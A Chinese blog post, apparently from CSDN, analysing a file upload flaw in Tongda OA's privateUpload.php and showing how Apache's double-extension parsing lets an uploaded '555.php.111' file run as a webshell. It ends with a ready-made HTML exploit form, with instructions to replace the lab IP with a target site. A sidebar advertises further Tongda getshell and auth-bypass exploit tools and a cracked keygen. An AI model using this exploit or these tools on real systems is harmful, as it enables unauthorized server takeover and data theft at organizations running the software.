通达oa getshell分析

最新推荐文章于 2024-05-13 11:27:18 发布
最新推荐文章于 2024-05-13 11:27:18 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: 通达oa getshell

在general/vmeet/ 下的 privateUpload.php文件
我们看看代码

include_once( "inc/conn.php" ); //包含conn.php该文件
include_once( "inc/utility_file.php" );//包含utility_file.php这个文件
ob_end_clean( );  //清除缓冲区
$uploadFileName = $_FILES['Filedata']['name'];  //获取上传文件名
$uploadFile = $_FILES['Filedata']['tmp_name'];   //获取上传临时文件地址
$uploadFileName = iconv( "UTF-8", $MYOA_CHARSET, $uploadFileName );  //转换文件名编码,统一utf-8
if ( is_uploaded_file( $uploadFile ) )  //这里判断是否已经上传了文件,如果存在临时文件则执行下面语句
{
        $pos = strrpos( $uploadFileName, "." ); //取文件名最好一个包含点的位置
        $len = strlen( $uploadFileName ); //获取文件名长度
        $extendType = substr( $uploadFileName, $pos, $len );//取最后的文件名
        if ( strtolower( $extendType ) == ".php" )  //判断后缀是否为.php如果是.php则不执行,如果否继续执行下面的语句
        {
                echo "upload file fobidden";
                exit( );
        }
        $localFileName = $_GET['fileName']; //get方式获取文件名 漏洞出现在这里
        $ZLCHAT_ATTACH = "upload/"; //上传目录
        $localFile = "{$ZLCHAT_ATTACH}/temp/".$localFileName; //上传位置,其中$localFileName是可控的变量
        if ( !td_move_uploaded_file( $uploadFile, $localFile ) ) //这里就上传了
        {
                echo "upload failed";
        }
}
?>

这是对上面代码的一个解析,看看我们怎么绕过这个过程拿下webshell呢?
首先我们必须得明白….这里系统采用的是apache服务器,apache服务器存在一个解析漏洞,即 当遇到这样的文件(1.php.222) 他会解析这个文件为php
我们这里就是利用这个漏洞绕过上面的检测后缀名的。

所以我们只要上传非php后缀的文件,然后我们自定义一个后缀为1.php.111这样就行了。 上传目录又告诉我们了,所以我们就这样可以轻松获取一个webshell了
这是我本地测试的结果

下面我附一下利用exp
保存下面的代码为1.html  如果需要测试的话,只需要将192.168.56.139改成你的目标站点
exp 放在这里

<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111″ method=”post”>Upload a new file:<br>
<input type=”file” name=”Filedata” size=”50″><br>
<input type=”submit” value=”Upload”>
<!–  http://192.168.56.139/general/vmeet/upload/temp/555.php.111    这里是上传之后的网马–>
</form>

7禧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通达OA任意文件上传_文件包含GetShell1
08-03
- 提供的链接中提到了一个解密工具(https://paper.seebug.org/203/),用于分析下载的通达OA V11版本的解密代码。这可能是为了帮助安全研究人员理解漏洞的工作原理和如何利用它。 5. **漏洞分析** - 漏洞主要...
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达OA 11.2后台getshell漏洞复现
Adminxe的博客
09-23 927
0x00 漏洞描述 通达OA 11.2“组织”-》”管理员”-》附件上传处存在任意文件上传漏洞,结合“系统管理”-》”附件管理”-》”添加存储目录”,修改附件上传后保存的路径,最终导致getshell 0x01 漏洞影响版本 通达OA 11.2 0x02 漏洞复现 1、下载https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe,windows下直接点击安装,管理用户admin,密码为空 2、使用admin,密码为空登录,点击”系统管理”...
通达OA 2011-2013 通杀GETSHELL
weixin_34185320的博客
04-24 403
转载自T00ls 此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)! 请各位看完本文后不要试图对任何使用本程序的网站进行破坏******等… 本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试***的意思! 若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关! EXP: 第一步: http://ip/general...
【漏洞复现】通达OA share身份认证绕过漏洞(2)
最新发布
2401_84972844的博客
05-13 424
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
通达OA 前台任意用户登录漏洞getshell
热门推荐
Summer's blog
05-13 1万+
前言    本次文章可以分为两部分,第一部分通达OA前台管理员伪造登录,第二部分后台附件getshell。作为一个笔记吧。 漏洞复现 管理员伪造登录 找到后台登录地址抓包修改url 删除cookie目的是返回管理员cookie 删除encode_type=1后面的值,替换成UID=1 后台getshell 找到附件管理,看看有没有附件保存地址。若没有,则添加个。 在会话页面找到自己,发...
通达oa 2013 php解密,通达OA 2011-2013 通杀GETSHELL修复补丁
weixin_30320081的博客
03-18 211
此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.EXP:第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys...
通达OA V11.6-删除认证文件getshell复现
thelostworld
08-21 401
相关漏洞简介:删除认证文件写入木马getshell 版本:tongdaV11.6 利用情况: 注意⚠️:此漏洞会删除认证的文件,然后上传shell,所以该漏洞是会破坏系统认证文件,如果成功利用后会删除程序中的php文件可能会导致程序功能无法使用。 漏洞复现过程 由于官方的版本更新至V11.7,V11.6版本不好找,找了一天多吧,找到了 看着是11.6,下载实际是11.7 环境搭建: OA安装过程: 默认设置就OK 安装完成:可以默认的配置 服务器配置: 配置完
tongda_oa_rce:通达oa越权登录+文件上传getshell
03-20
通达OA越权登录+文件上传getshell 用法 点安装-r requirements.txt python tongda.py url.txt:测试url,支持批量 shell.txt:上传成功的webshel​​l cookie.txt:登录成功的cookie webshel​​l密码a 已测试...
通达oa 11.9 安装包
02-22
通达oa 11.9 安装包
通达OA注册机破解版
05-05
通达OA注册机破解版.已经破解接触所有功能,为了支持正版没有只有25人授权
php findstr,通达OA v11.7 一键getshell脚本
weixin_30843121的博客
03-27 332
微信公众号:云剑侠心通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊访问漏洞页面获取phpsessionhttp://x.x.x.x/mobil...
某知名OA高版本getshell思路(附部分脚本)
C20220511的博客
07-26 2301
本文以曾经研究过的通达OA11.9版本为例,阐述在高版本通达中如何利用通达自身的特性来getshell。文中涉及的所有漏洞都是笔者自研和首发,大多数已在最新版的通达OA12.0中修复,本文只是分享一下挖掘这些漏洞的思路和过程。很多时候我们想拿到权限,不一定非要通过某个牛逼的漏洞,组合利用一些特性也能带来意想不到的效果。...
通达前台任意用户session伪造+后台getshell
m_ing
08-27 1175
前言:通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录,包括admin 漏洞影响版本:通达OA < 11.5.200417 版本 准备条件: m_ing是此次利用的poc,目标的url直接写在url.txt中,vuln.txt是输出结果 运行脚本需要python3环境,python m_ing.py时会出现报错需要安装相应的
2015通达oa-从前台注入到后台getshell
dengzhasong7076的博客
12-16 2051
最近做众测的时候遇上的一个系统,2015版本的最新更新日期:2016-07-22 注入分析 \inc\common.inc.php <?php function SecureRequest(&$var) { if (is_array($var)) { foreach ($var as $_k => $_v ) { $v...
通达OA getshell
weixin_34410662的博客
04-24 566
exp: <formid="frmUpload"enctype="multipart/form-data"action="http://ip:port/general/vmeet/privateUpload.php?fileName=211.php.111"method="post">Uploadanewfile:<br><...
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4779
通达OA系统11.2版本为案例的Web渗透
通达OA工作流程全指南
"通达OA是一款企业级的协同办公系统,涵盖了各种工作流程,包括发文收文、行政部管理、资讯部管理、人力资源、销售部、仓库管理、财务部、生产部以及工程部等多个部门的工作流程。这个操作手册旨在帮助用户理解和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值